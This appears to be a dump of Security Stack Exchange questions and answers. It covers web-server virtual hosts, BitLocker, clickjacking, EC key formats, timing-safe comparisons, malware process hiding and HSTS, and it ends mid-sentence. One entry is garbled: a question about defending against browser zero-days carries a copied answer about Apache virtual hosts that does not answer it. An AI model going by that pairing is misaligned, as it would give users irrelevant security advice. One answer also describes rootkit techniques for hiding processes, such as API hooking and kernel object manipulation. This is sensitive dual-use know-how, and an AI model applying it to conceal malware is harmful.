83,362 | I just discovered that someone is pointing their domain name to the server I use for a website, which results in traffic to their domain displaying the content of my website. How can I stop this illegitimate use of content? | The answer depends on the web-server you are using. For example, apache allows for the creation of multiple virtual hosts, of which the first described is considered the default one. What I suggest to do, is to create this default "catch-all" virtual-host with a global deny rule on it. Then configure your own web-site with a virtual-host identified with your domain name. Therefore, any request coming in with a domain not matching your shall be denied access (404 I suppose). An other thing you could do is get the "whois" information on said domain, ISP usually list in the records an email address to report abuse. Collect some information from your logs and ask the provider to terminate this. | {
"source": [
"https://security.stackexchange.com/questions/83362",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/64130/"
]
} |
83,365 | If we suppose that an attacker has a zero-day vulnerability for a major browser, and can exploit this vulnerability. How can a Linux/Ubuntu user secure themselves from downloading malware (like keyloggers or other stuff that can can access to user's OS / escalate privileges) and gain execution a user's system? | The answer depends on the web-server you are using. For example, apache allows for the creation of multiple virtual hosts, of which the first described is considered the default one. What I suggest to do, is to create this default "catch-all" virtual-host with a global deny rule on it. Then configure your own web-site with a virtual-host identified with your domain name. Therefore, any request coming in with a domain not matching your shall be denied access (404 I suppose). An other thing you could do is get the "whois" information on said domain, ISP usually list in the records an email address to report abuse. Collect some information from your logs and ask the provider to terminate this. | {
"source": [
"https://security.stackexchange.com/questions/83365",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/68546/"
]
} |
83,386 | I have a USB drive encrypted with BitLocker Drive Encryption. Each time I insert the drive in my USB port it works as expected, requires me to enter the password. Maybe I have the BitLocker Drive Encryption configured wrong or something not sure but, after inserting the USB drive and entering my password I can go to a completely different PC with a different network ID etc on the same network I'm able to see everything on my thumb drive. Not only can I see everything from other PCs I can write to it delete etc. I thought it would have required me to enter my password when I mapped to it from a different PC. Can anyone explain why other PCs can map to my encrypted drive and have full access to everything? | You’re misunderstanding what BitLocker is supposed to protect against. The goal of BitLocker is to protect your data from cold boot attacks (as explained in a Technet blog entry ). When you unlock a volume protected by BitLocker, the system gains access to the keys necessary to decrypt the drive and behaves as if it was a regular drive. That is necessary to make the system compatible with any and all applications (and drivers) without requiring them to know about BitLocker. (That’s why it’s called transparent disk encryption: applications and drivers don’t see it.) This means you’re free to share the volume over the network and, if you carelessly apply no kind of ACL restriction on who can access the data, then everyone can access it freely. | {
"source": [
"https://security.stackexchange.com/questions/83386",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/69273/"
]
} |
83,393 | How can I prevent network administrators from accessing, mapping to etc. a USB drive that's in a PC on their network? I'm mainly concerned about files being edited or deleted. | You effectively can't. If you're on somebody else's machine and they have administrative rights to it, then that's the game. The quite fancy answer be mandatory access control systems like SELinux which hold a concept higher than root that would at least require a reboot and direct system access to change the settings. | {
"source": [
"https://security.stackexchange.com/questions/83393",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/69273/"
]
} |
83,610 | My friends have expressed an interest in hacking, but we don't want to do anything illegal, and considered CTF365, but it was WAY to expensive. Is it possible/legal for one of us to create a private website for us to hack, or play attack/defend with two websites of our own? | To the best of my knowledge, yes, it's legal. Every anti-hacking law I'm aware of refers to unauthorized access, and if you've got permission to hack it, it's not unauthorized, is it? Note that there are some things you'll need to watch out for. Some jurisdictions prohibit the possession of "hacking tools" (akin to prohibiting possession of lockpicks, but less well-defined), and some techniques, such as packet spoofing or (D)DoS, can have collateral damage that would fall afoul of the law. You'll also want to check your webhost's opinion of what you're doing. They may not permit this because of possible effects on other customers; if you're hosting the website on your home connection, you might be violating your ISP's terms of service. If you want to be completely safe, do this on a dedicated network that is isolated from the Internet entirely. A cheap Ethernet switch and a Raspberry Pi or two can get you a setup you can play with for under $100. | {
"source": [
"https://security.stackexchange.com/questions/83610",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70097/"
]
} |
83,614 | Both the sender and the receiver deleted the text after it was sent, but is it still possible that it exists somewhere and that someone can get to it? | It is absolutely not secure. Text messages function essentially the same way email does: your client (phone) forwards it to a server, which then looks up a destination which may be on another network (carrier) and then sends it over where it is held in a mailbox until a phone gets it. Anywhere along the way it can be copied, retained longer than expected, etc. Lawful interception, unlawful interception, cloned phones, Google+ accounts, etc are all ways a message can end up somewhere unexpected and all that assumes you trust the phone and software on it. Clear text is compromised text. Always. | {
"source": [
"https://security.stackexchange.com/questions/83614",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70103/"
]
} |
83,641 | While visiting some https websites (like online banks, etc) url string appear to have little extra green box on the left hand side, with some organisation details. While other https websites just show a padlock see example pic. Why is that, and whats the difference. | The basic distinction is between a certificate verifying control of a domain, and a certificate verifying the real-world entity behind the domain. With a standard SSL certificate, all that's verified is that the entity with the certificate legitimately controls that domain. It doesn't mean that that's the entity I think it is; I could register bankofamerica.co, and I can then legitimately get a domain-validated certificate for it, and that would show up as a green lock in browsers. What that box indicates is that CAs have done more validation; EV certificates (the green box) generally require actually verifying the existence and name of the business requesting them. I could not get an EV certificate for that site that says "Bank of America" on it, because I don't have a company called Bank of America, and even if I did the actual person reviewing an EV cert application (unlike normal certs, EV certs aren't automated) would likely be somewhat suspicious at someone claiming to be a bank. So that's the stated role of EV certs: Verifying that the server sending you a webpage is the correct server for that domain doesn't really help unless you also know that the domain is owned by the company you want to interact with. With Google and Facebook, you know already that their websites are google.com and facebook.com, so I know that I want to talk to google.com, and if I'm talking to the real google.com that's enough. With other organizations, it's not necessarily enough to know I'm talking to the real so-and-so.com; I also need to know so-and-so.com is the actual website I want to be talking to. | {
"source": [
"https://security.stackexchange.com/questions/83641",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70138/"
]
} |
83,660 | As I learned in a comment for How to encrypt in PHP, properly? , I was told using a string comparison like the following in PHP is susceptible to timing attacks. So it should not be used to compare two MACs or hashes (also password hashes) for equality. if ($hash1 === $hash2) {
//mac verification is OK
echo "hashs are equal"
} else {
//something bad happenend
echo "hashs verification failed!";
} Can someone please detail me what exactly the problem is, how an attack would look like and possibly provide a secure solution that avoid this particular problem.
How should it be done correctly? Is this a particular Problem of PHP or do other languages like e.g. Python, Java, C++, C etc. have the same issues? | I will add a list with time constant functions for different languages: PHP : Discussion: https://wiki.php.net/rfc/timing_attack bool hash_equals ( string $known_string , string $user_string ) http://php.net/manual/en/function.hash-equals.php Java Discussion : http://codahale.com/a-lesson-in-timing-attacks/ public static boolean MessageDigest.isEqual(byte[] digesta, byte[] digestb) http://docs.oracle.com/javase/7/docs/api/java/security/MessageDigest.html#isEqual(byte[],%20byte[]) C/C++ Discussion: https://cryptocoding.net/index.php/Coding_rules int util_cmp_const(const void * a, const void *b, const size_t size)
{
const unsigned char *_a = (const unsigned char *) a;
const unsigned char *_b = (const unsigned char *) b;
unsigned char result = 0;
size_t i;
for (i = 0; i < size; i++) {
result |= _a[i] ^ _b[i];
}
return result; /* returns 0 if equal, nonzero otherwise */
} More I found here: http://www.levigross.com/2014/02/07/constant-time-comparison-functions-in-python-haskell-clojure-java-etc/ Python (2.x): #Taken from Django Source Code
def constant_time_compare(val1, val2):
"""
Returns True if the two strings are equal, False otherwise.
The time taken is independent of the number of characters that match.
For the sake of simplicity, this function executes in constant time only
when the two strings have the same length. It short-circuits when they
have different lengths.
"""
if len(val1) != len(val2):
return False
result = 0
for x, y in zip(val1, val2):
result |= ord(x) ^ ord(y)
return result == 0 Python 3.x #This is included within the stdlib in Py3k for an C alternative for Python 2.7.x see https://github.com/levigross/constant_time_compare/
from operator import _compare_digest as constant_time_compare
# Or you can use this function taken from Django Source Code
def constant_time_compare(val1, val2):
"""
Returns True if the two strings are equal, False otherwise.
The time taken is independent of the number of characters that match.
For the sake of simplicity, this function executes in constant time only
when the two strings have the same length. It short-circuits when they
have different lengths.
"""
if len(val1) != len(val2):
return False
result = 0
for x, y in zip(val1, val2):
result |= x ^ y
return result == 0 Haskell import Data.Bits
import Data.Char
import Data.List
import Data.Function
-- Thank you Yan for this snippet
constantTimeCompare a b =
((==) `on` length) a b && 0 == (foldl1 (.|.) joined)
where
joined = zipWith (xor `on` ord) a b Ruby def secure_compare(a, b)
return false if a.empty? || b.empty? || a.bytesize != b.bytesize
l = a.unpack "C#{a.bytesize}"
res = 0
b.each_byte { |byte| res |= byte ^ l.shift }
res == 0
end Java (general) // Taken from http://codahale.com/a-lesson-in-timing-attacks/
public static boolean isEqual(byte[] a, byte[] b) {
if (a.length != b.length) {
return false;
}
int result = 0;
for (int i = 0; i < a.length; i++) {
result |= a[i] ^ b[i]
}
return result == 0;
} | {
"source": [
"https://security.stackexchange.com/questions/83660",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5707/"
]
} |
83,677 | Alice wants to share a message with Bob, but Alice and Bob can never be in the same place at the same time. We can assume they both know each others public keys (or agreed on a shared key, if that makes a difference). Is it safe for Alice to broadcast the ciphertext over the TV/radio/public internet/etc, or should she send Bob the ciphertext over video chat/phone/email? I understand that modern algorithms are resistant to ciphertext-only attacks, but is the layer of obscuring the email from the public practically beneficial? | That is exactly what encryption is designed to safely enable. If Bob and Alice could safely share the message without allowing attackers and eavesdroppers access to it, they would not, in fact, need encryption at all. So, yes, it is safe to allow any and everyone access to the ciphertext. You do want to authenticate it so that it cannot be tampered with in transit, but done correctly, we don't believe there is any non-negligible risk of compromising the confidentiality of the message. | {
"source": [
"https://security.stackexchange.com/questions/83677",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70166/"
]
} |
83,692 | Androids apps use fine-grained permissions for security reasons, iOS apps (afaik) do it as well. Windows 8.1 applications don't have a permission schema like that, all Linux versions which I have tried so far don't have it either and I guess Mac OS X also doesn't have it, right? Why are these fine-grained permissions considered necessary on a mobile device, but not on a desktop system? Do users trust apps on a mobile device less than on a desktop system? Will Windows 10 or newer Linux and Mac OS versions have them? PS: it seems that some people consider this to be a possible duplicate to Why are apps for mobile devices more restrictive than for desktop? - but both questions differ at least in the point of view (developer/user). And if you read the answer, you will also see that most SO users consider both questions as beeing different :-) | There are two main reasons why smartphones have fine-grained permissions while desktop computers don't. History. Mainframe operating systems have a tradition of giving permissions to the user rather than to the program , and this carried over into minicomputers/workstations/desktops; the desire to maintain compatibility with existing programs limits the ability to change things. Smartphones are a clean break with existing application ecosystems, so the opportunity existed to change the permissions model. Smartphones are far more homogeneous than desktops, and generally don't change their hardware configuration over time. This makes setting up the permissions system far easier. That said, there are fine-grained permission systems for desktop operating systems. Linux, for example, has AppArmor, SELinux, Bitfrost, and probably others. | {
"source": [
"https://security.stackexchange.com/questions/83692",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5203/"
]
} |
83,831 | Google Chrome is showing new information in the certificate section. Is this a big deal? If so how can I fix it on the server end? EDIT: Thanks for the answers but I'm not skilled in cryptography so the only thing I can update with is this certificate was created by Shell in a Box, and I was also wondering if this was ruining the security of TLS/SSL communication with the application and if so, how I could fix it. | Your exact case is that RSA is used as the key exchange mechanism. Instead, you should use DHE_RSA or ECDHE_RSA . To remove the "obsolete cryptography" warning, you'll need to use "modern cryptography" which is defined as: Protocol: TLS 1.2 or QUIC Cipher: AES_128_GCM or CHACHA20_POLY1305 Key exchange: DHE_RSA or ECDHE_RSA or ECDHE_ECDSA Twitter discussion: https://twitter.com/reschly/status/534956038353477632 Commit: https://codereview.chromium.org/703143003 This has nothing to do with a certificate. There is a special "outdated security settings" warning when a certificate uses weak signature algorithm, but this is about authentication, not about encryption. Note that you are still getting a green lock, even in case of obsolete encryption. | {
"source": [
"https://security.stackexchange.com/questions/83831",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/69936/"
]
} |
84,229 | I have registered a .com domain and received an e-mail from domainadmin.com, it looks extremely like a phishing e-mail, but after a research I am ultimately confused whether this thing is legitimate or not, it seems as something new for sure. It basically asks you to click a button, where you agree to some terms and conditions that I don't want to read, as I've got other work to do. There is the contract: http://approve.domainadmin.com/registrant/index.cgi?action=contract And this is the e-mail I received: Please read this important e-mail carefully. Recently you registered, transferred or modified the contact information for the following domain name: domain.com In order to ensure your domain name remain active, you must now click the following link and follow the instructions provided. Did anyone come across? | As Polynomial mentioned, this is part of ICANN-mandated WHOIS verification. The reason it goes to domainadmin.com is that ICANN doesn't actually run the verification -- rather, like just about all ICANN things, they set policies that are then implemented by others (remember, your .com domain is in a registry operated by Verisign, and was registered by a registrar who was neither ICANN nor Verisign). It's the registrar's job to verify certain WHOIS info; the relevant policy is here , and they must suspend your domain if they can't verify the info. The reason you're seeing domainadmin.com is that whoever you bought your domain from is likely reselling them from OpenSRS (which basically exists as a platform for domain resellers), which is a label of Tucows. As the registrar, Tucows is responsible for WHOIS verification on domains bought from them; because OpenSRS is mostly a platform for resellers, they generally do so via domainadmin.com (which they own, and which is intentionally white-label). Source 1, and a discussion on their site about this domain choice. So, this email is likely legitimate, and you need to do what it says or your domain will be suspended. domainadmin.com isn't affiliated with ICANN, it's affiliated with your registrar (you actually bought your domain from a reseller of this registrar). It's intentionally generic because some resellers want a generic thing; resellers who want non-generic have the option to make it non-generic, but most resellers don't want it showing OpenSRS or Tucows prominently. | {
"source": [
"https://security.stackexchange.com/questions/84229",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/69348/"
]
} |
84,236 | I was chatting to a guy on a site, and the chat went wrong when I wrote a few wrong words by mistake. He then threatened that he will send my every detail to the vigilant team and soon my address will be known. He then showed me my IP address, the Windows version I am using, the browser, and other stuff. What should I do now to save myself? | Don't worry about it, those are things that any website you visit can obtain. The OS and browser info might help them develop a more targeted attack, but as long as your home firewall is secured these are likely empty threats. They could target a botnet at you to DDoS your connection, but many ISPs will notice this traffic and might block as much as possible (flood detection) or might assign you a different IP address anyway. If you're paranoid, try powering your modem off for about half an hour. You will usually get a new IP address assigned to you from your ISP. | {
"source": [
"https://security.stackexchange.com/questions/84236",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70768/"
]
} |
84,327 | Is there any way to convert an ECC private key to RSA PKCS#1 format?
I have tried converting it to PKCS#8 first using OpenSSL: openssl pkcs8 -topk8 -nocrypt -in EC_key.pem -out pkcs8_key.pem This results in a pem file that is in (what i am assuming) the right PKCS8 format -----BEGIN PRIVATE KEY-----
[snip]
-----END PRIVATE KEY----- When trying to then convert it from PKCS#8 to PKCS#1 using the following command: openssl pkcs8 -inform pem -nocrypt -in pkcs8_key.pem -out pkcs1_key.pem I get the same file as from the previous step. When using the following command for conversion: openssl rsa –in pkcs8_key.pem –out pkcs1_key.pem I get the following error: 47049676604576:error:0607907F:digital envelope routines:EVP_PKEY_get1_RSA:expecting an rsa key:p_lib.c:279: Can EC keys be converted to RSA PKCS#1 keys? And if yes, how? | There might be a bit of confusion here between "RSA Laboratories", the organization that edits the PKCS standards, and RSA, the cryptographic algorithm. PKCS#1 is one of the PKCS standards, thus edited by RSA Laboratories; it talks about the algorithm RSA, and only about the RSA algorithm. In particular, there is no such thing as a "PKCS#1 format" for elliptic curve (EC) keys, because EC keys are not RSA keys -- they are EC keys, which is not at all the same kind of object. However, confusion has spread a lot further, so let's unravel a few layers. PKCS#1 talks about RSA and defines an ASN.1-based encoding for RSA private keys. It looks like this: RSAPrivateKey ::= SEQUENCE {
version Version,
modulus INTEGER, -- n
publicExponent INTEGER, -- e
privateExponent INTEGER, -- d
prime1 INTEGER, -- p
prime2 INTEGER, -- q
exponent1 INTEGER, -- d mod (p-1)
exponent2 INTEGER, -- d mod (q-1)
coefficient INTEGER, -- (inverse of q) mod p
otherPrimeInfos OtherPrimeInfos OPTIONAL
} We recognize here the various mathematical elements that constitute a RSA public/private key pair. Being based on ASN.1 , this kind of object encodes (through DER ) into some bytes. OpenSSL can produce and consume such a sequence of bytes; however, it is commonplace to further reencode these bytes into the traditional (and poorly specified) PEM format: the bytes are encoded with Base64 , and a header and footer are added, that specify the kind of encoded object. It is important to notice that the raw ASN.1-based format for RSA private keys, defined in PKCS#1, results in sequences of bytes that do NOT include an unambiguous identification for the key type. Any application that reads a DER-encoded RSA private key in that format must already know, beforehand, that it should expect a RSA private key. The PEM header, that says "RSA PRIVATE KEY", provides that information. Since the PKCS standards don't talk about PEM, they provide their own solution to the issue of identifying the key type; it is called PKCS#8 . A key in PKCS#8 format is again ASN.1-based, with a structure that looks like this: PrivateKeyInfo ::= SEQUENCE {
version Version,
privateKeyAlgorithm AlgorithmIdentifier {{PrivateKeyAlgorithms}},
privateKey PrivateKey,
attributes [0] Attributes OPTIONAL }
Version ::= INTEGER {v1(0)} (v1,...)
PrivateKey ::= OCTET STRING What this means is that a PKCS#8 object really is a wrapper around some other format. In the case of a RSA private key, the wrapper indicates (through the privateKeyAlgorithm field) that the key is really a RSA key, and the contents of the PrivateKey field (an OCTET STRING , i.e. an arbitrary sequence of bytes) really are the DER encoding of a PKCS#1 private key. OpenSSL, by default, won't let a PKCS#8 file live its life as a DER-encoded sequence of bytes; it will again convert it to PEM, and, this time, will add the "BEGIN PRIVATE KEY" header. Note that this header does not specify the key type, since the encoded object (turned to characters through Base64) already contains the information. (As a further complication, PKCS#8 also defines an optional, often password-based encryption of private keys; and the traditional PEM-like format that OpenSSL implements also includes some generic support for password-based encryption; so you can have multiple combinations of wrappers that specify some kind of encryption, resulting in what can only be described as an utter mess.) Now what does this tells us about EC keys ? EC keys are not described by PKCS#1 (that talks only about RSA). However, if there is a standard somewhere that says how an EC private key can be turned into a sequence of bytes, then: that sequence of bytes could be PEM-encoded by OpenSSL with some explicit text header; the same sequence of bytes could be wrapped into a PKCS#8 object. And this is exactly what happens. The standard that defines the encoding format for EC keys is SEC 1 (nominally, the standard for EC cryptography is ANSI X9.62; however, while X9.62 reused much of SEC 1, the specification for encoding private EC keys is only in SEC 1, because X9.62 concerns itself only with the encoding of public keys). In SEC 1 (section C.4), the following is defined: ECPrivateKey ::= SEQUENCE {
version INTEGER { ecPrivkeyVer1(1) },
privateKey OCTET STRING,
parameters [0] EXPLICIT ECDomainParameters OPTIONAL,
publicKey [1] EXPLICIT BIT STRING OPTIONAL
} So an encoded private key contains the private key itself (a integer in the 1.. n -1 range, where n is the curve subgroup order), optionally a description or reference to the used curve, and optionally a copy of the public key (which could otherwise be recomputed). Let's try it. We generate with OpenSSL a new EC key pair, in the standard NIST P-256 curve (which is the curve that everybody implements and uses): $ openssl ecparam -out ec1.pem -genkey -name prime256v1 We get this, in the ec1.pem file: $ cat ec1.pem
-----BEGIN EC PARAMETERS-----
BggqhkjOPQMBBw==
-----END EC PARAMETERS-----
-----BEGIN EC PRIVATE KEY-----
MHcCAQEEIBdVHnnzZmJm+Z1HAYYOZlvnB8Dj8kVx9XBH+6UCWlGUoAoGCCqGSM49
AwEHoUQDQgAEThPp/xgEov0mKg2s0GII76VkZAcCc//3quAqzg+PuFKXgruaF7Kn
3tuQVWHBlyZX56oOstUYQh3418Z3Gb1+yw==
-----END EC PRIVATE KEY----- The first element ("EC PARAMETERS") is redundant; it contains a reference to the used curve, but this information is also present in the second element. So let's use a text editor to remove the "EC PARAMETERS", and we keep only the "EC PRIVATE KEY" part. Now my ec1.pem file looks like this: $ cat ec1.pem
-----BEGIN EC PRIVATE KEY-----
MHcCAQEEIBdVHnnzZmJm+Z1HAYYOZlvnB8Dj8kVx9XBH+6UCWlGUoAoGCCqGSM49
AwEHoUQDQgAEThPp/xgEov0mKg2s0GII76VkZAcCc//3quAqzg+PuFKXgruaF7Kn
3tuQVWHBlyZX56oOstUYQh3418Z3Gb1+yw==
-----END EC PRIVATE KEY----- We can use OpenSSL to decode its structure: $ openssl asn1parse -i -in ec1.pem
0:d=0 hl=2 l= 119 cons: SEQUENCE
2:d=1 hl=2 l= 1 prim: INTEGER :01
5:d=1 hl=2 l= 32 prim: OCTET STRING [HEX DUMP]:17551E79F3666266F99D4701860E665BE707C0E3F24571F57047FBA5025A5194
39:d=1 hl=2 l= 10 cons: cont [ 0 ]
41:d=2 hl=2 l= 8 prim: OBJECT :prime256v1
51:d=1 hl=2 l= 68 cons: cont [ 1 ]
53:d=2 hl=2 l= 66 prim: BIT STRING We recognize the expected ASN.1 structure, as defined by SEC 1: a SEQUENCE that contains an INTEGER of value 1 (the version field), an OCTET STRING (the privateKey itself, which is a big-endian unsigned encoding of the mathematical private key), a reference (tagged with [0] ) to the used curve (in the ASN.1 object it is the OID 1.2.840.10045.3.1.7; OpenSSL translates that to the name "prime256v1"), and (tagged with [1] ) a copy of the public key. We can convert that to the (unencrypted) PKCS#8 format: $ openssl pkcs8 -topk8 -nocrypt -in ec1.pem -out ec2.pem which yields this: $ cat ec2.pem
-----BEGIN PRIVATE KEY-----
MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgF1UeefNmYmb5nUcB
hg5mW+cHwOPyRXH1cEf7pQJaUZShRANCAAROE+n/GASi/SYqDazQYgjvpWRkBwJz
//eq4CrOD4+4UpeCu5oXsqfe25BVYcGXJlfnqg6y1RhCHfjXxncZvX7L
-----END PRIVATE KEY----- that we can decode with OpenSSL: $ openssl asn1parse -i -in ec2.pem
0:d=0 hl=3 l= 135 cons: SEQUENCE
3:d=1 hl=2 l= 1 prim: INTEGER :00
6:d=1 hl=2 l= 19 cons: SEQUENCE
8:d=2 hl=2 l= 7 prim: OBJECT :id-ecPublicKey
17:d=2 hl=2 l= 8 prim: OBJECT :prime256v1
27:d=1 hl=2 l= 109 prim: OCTET STRING [HEX DUMP]:306B0201010420(...) (I have truncated the hexadecimal dump.) This structure is indeed a PKCS#8 object: The algorithm identifier field says: "this contains an EC key" (technically, it uses an identifier whose name is "id-ecPublicKey", but since this occurs in a PKCS#8 file everybody knows that this really means an EC private key). The file includes as key parameters a reference to the used curve. The key value is encoded into the contents of an OCTET STRING . If we further decode that OCTET STRING, we will find the EC private key encoded as specified by SEC 1 (amusingly, the reference to the curve appears to have been omitted in that case, since it is already present in the key parameters). Conversion can be made in the other direction (from PKCS#8 to raw SEC 1 format) with: $ openssl ec -in ec2.pem -out ec3.pem You will then get in file ec3.pem exactly what you had in file ec1.pem : a PEM-encoded object with header "BEGIN EC PRIVATE KEY". Summary: There is no such thing as an "EC key in PKCS#1 format": PKCS#1 is only for RSA keys, not EC keys. However, there is another format, analogous to PKCS#1 but made for EC keys, and defined in SEC 1. OpenSSL can convert that format into the generic PKCS#8 with the " openssl pkcs8 " command, and back into SEC 1 format with " openssl ec ". | {
"source": [
"https://security.stackexchange.com/questions/84327",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70853/"
]
} |
84,377 | As I understand it, this is how an attacker would exploit clickjacking: Create a new website malicioussite.com which includes my site in a frame, but overlays malicious input fields or buttons over the HTML elements of my site. Send out phishing emails to get users to click on the link that goes to malicioussite.com rather than my site (or use some other technique to distribute the phishing link). Users enter data into or click on the malicious elements. Profit Savvy users would either not click the link, or notice that the address bar is incorrect. However, plenty of people would probably not notice. My question is this: Can't the attacker achieve the same thing by using malicioussite.com as a reverse proxy? All the steps above would be the same, except that malicioussite.com would forward the requests to my site and then insert an extra <script> tag in the HTML response to run the malicious code and add the malicious HTML elements. The X-FRAME-OPTIONS header wouldn't help in that case because there are no frames (and the reverse proxy can strip it out anyway). The attack relies on the user not checking the address bar, so if the attacker can implement the same attack in a different way that can't be defeated, why bother with X-FRAME-OPTIONS or other clickjacking protections? | This is a very interesting question. First of all, let's start with your scenario: A user visiting website www.evil.com which is a reverse proxy that loads www.good.com and modifies its content. Congratulations ! You've just re-invented a classic MiTM attack , but a very poor one. Visiting evil.com means that your browser won't send good.com cookies, which means that your reverse proxy won't be able to act on behalf of the user. To fix this, now you'll have to trick the user into logging in to your reverse proxy with his good.com . Congratulations ! You've re-invented an attack with a fake landing page. The scenario you're describing has nothing to do with clickjacking, and we actually employ clickjacking protection for a very different reason: With clickjacking, an attacker would trick an authenticated user into performing some action. Even if the user is visiting evil.com , unlike your proposed scenario with a reverse proxy, his request is still sent to good.com along with the cookies containing his session ID. Thus, the action will be performed within the authenticated user's session. Does that sound familiar? Yes it does, because that's how a CSRF attack works, but the only difference is that, with CSRF, the action is performed programatically.. except for one little thing: Clickjacking defeats anti-CSRF mechanisms. With clickjacking, the action is performed within the user's browser, by the user himself, and inside the legitimate page (loaded within iFrame). So, in short: Your proposed attack is indeed plausible, but we use anti-clickjacking to defeat completely different attacks. For that, yes, clickjacking is indeed a real, distinct security concern. | {
"source": [
"https://security.stackexchange.com/questions/84377",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70881/"
]
} |
84,385 | Can malicious software hide itself, so its activity doesn't appear in the list of processes from Task Manager? Can it hide itself so when someone is controlling your computer, even if you open Task manager, you won't see any suspicious activity? If yes, how can it do that? What techniques can be used to hide in this way? | Yes. There are a number of ways: Directly patch Task Manager's process at runtime so that its enumeration code skips over your process. Run "processless", by loading a DLL into a process (e.g. via AppInit_DLLs ) or injecting code into process memory and starting a thread (via VirtualAllocEx / WriteProcessMemory / CreateRemoteThread ). Hook the Process32First / Process32Next functions in every process (incl. task manager) to "skip" your process when the enumeration is performed. Hook CreateToolhelp32Snapshot so that the mapped section's memory (see here for how snapshots work) is modified ahead of time, so that Process32First / Process32Next end up reading from fake data. Hook ntdll.dll!NtQuerySystemInformation and, if SystemProcessInformation is passed, patch the results to skip over your process. This is a lower level hook than the above calls. Load a kernel-mode driver which hooks the kernel-mode handler for SystemProcessInformation queries. I don't know the real name for this in Windows (it's not documented) but essentially there's a table of handlers which NtQuerySystemInformation looks through for this purpose, and you just have to hook the right one. Here's the ReactOS implementation of the actual handler. In this you'd just mess with the returned structs so that your process isn't shown. Hook the SSDT to catch the transition between user-mode and kernel-mode for when various process enumeration APIs are called. Use Direct Kernel Object Manipulation (DKOM) to modify the EPROCESS structures in memory so that your process is hidden from the kernel entirely. The kernel maintains a circularly linked list of structures which represent all running processes, with FLink and BLink fields as forward and backward pointers respectively. By manipulating those pointers to jump over your process, then manipulating your process' pointers to go back to themselves, the kernel will skip over your process during enumeration. This is a common rootkit technique. | {
"source": [
"https://security.stackexchange.com/questions/84385",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/69756/"
]
} |
84,397 | Disclaimer: as you will see from my question I'm a total outsider in this subject, just very curious. I was wondering how easy it would be to crack a password-protected RAR5 file, and I found many answers along the lines of "a truly random password would be much more difficult to crack than a password based on real words". Also, a lot of answers refer to password randomness. I know that passwords based on real words are easily cracked by dictionary attacks and probably this is what those answers refer to, but I'm still not clear about what "random" means in the context of password creation, for the following reason. Even if I generate a sequence of characters using the best "randomizer" ever, the chances that I get HelloWorld and the chances that I get f.ex. gkwwpBnePU are in my understanding exactly the same, so does "random" in this context mean "as distant as possible from any real word" ? But if yes, doesn't this make the password not-so-random after all? The thought that started my doubt - which I believe is the same concept but I'm not sure - is: if I choose a password which is a real word but from an obscure dialect of a very uncommon language whose dictionary no attackers would feed to their cracking tools, would such password still be more crackable than gkwwpBnePU ? (assuming of course that gkwwpBnePU isn't actually a real word in any language, see what I mean?). | "Random" means: "that which the attacker does not know". The important point to understand is that attack costs are always on average . They don't make sense on a single data point. An attacker may always get lucky and find the right password on his first try. This is merely improbable. If you generate passwords as sequences of purely random characters, then you may obtain "HelloWorld"; but usually you won't, and, crucially, the attacker won't be able to guess with non-negligible probability that your password consists of two concatenated English words because, on average , it does not. One way to say it is that password entropy is not a property of the password, but of the process that generated the password; and it does not impact the contents of a single password, but the average contents of passwords, taken over sufficiently many experiments. More on password entropy here . Averages are still the important notion because the attacker, like everybody else, thinks in terms of economics (although he, like most other people, is not completely aware of it). The attacker won't bother attacking your password if his chances of breaking it are lower than his chances of winning millions of dollars at the lottery. Even if he may always "get lucky", the lottery is much less effort, and 50 millions of dollars are a lot more rewarding than an access to your Facebook account. | {
"source": [
"https://security.stackexchange.com/questions/84397",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/56343/"
]
} |
84,465 | I have a simple login form on my web page and the URL looks like this: example.com/signup/signup.php?q=1 If I try something like this: example.com/signup/signup.php?q=1&() I'm redirected to a stack dump that looks something like this: exception 'DOMException' with message 'Invalid Character Error' in /<mydirectory>/a_xml.class.php:74
Stack trace:
#0 /<mydirectoy>/a_xml.class.php(74): DOMDocument->createElement('()')
...
#6 {main} Is this a big problem in terms of security? Are there any attacks a malicious user can perform that will allow him to deface or steal my database? Or is this relatively benign and I can ignore it? | On production (contrary to development) environments, stack traces and error messages should be logged to file instead of dumped on screen. This is because an attacker may learn things about your system that could help compromise your system. Information such as operating system, web server version, PHP version and more. Some stack traces may contain system/environment variables that should not be made public! The user/visitor should get a nice looking HTTP error page instead of a message that is of no use to the visitor. | {
"source": [
"https://security.stackexchange.com/questions/84465",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70965/"
]
} |
84,714 | Why does the RFC prohibit the server from sending HSTS to the client over HTTP? I can see that if a HTTP client responds to that unsecure HTTP response it might cause that site to be inaccessible to the client, but I don't see any reason for the server to have a MUST in the protocol. Rather the client MUST NOT respond to HSTS in unsecure HTTP responses is the correct approach in my mind. What am I missing? # 7.2. HTTP Request Type If an HSTS Host receives an HTTP request message over a non-secure
transport, it SHOULD send an HTTP response message containing a
status code indicating a permanent redirect, such as status code 301
( Section 10.3.2 of [RFC2616] ), and a Location header field value
containing either the HTTP request's original Effective Request URI
(see Section 9 ("Constructing an Effective Request URI")) altered as
necessary to have a URI scheme of "https", or a URI generated
according to local policy with a URI scheme of "https". NOTE: The above behavior is a "SHOULD" rather than a "MUST" due
to: Risks in server-side non-secure-to-secure redirects
[ OWASP-TLSGuide ]. Site deployment characteristics. For example, a site that
incorporates third-party components may not behave correctly
when doing server-side non-secure-to-secure redirects in the
case of being accessed over non-secure transport but does
behave correctly when accessed uniformly over secure transport.
The latter is the case given an HSTS-capable UA that has
already noted the site as a Known HSTS Host (by whatever means,
e.g., prior interaction or UA configuration). An HSTS Host MUST NOT include the STS header field in HTTP
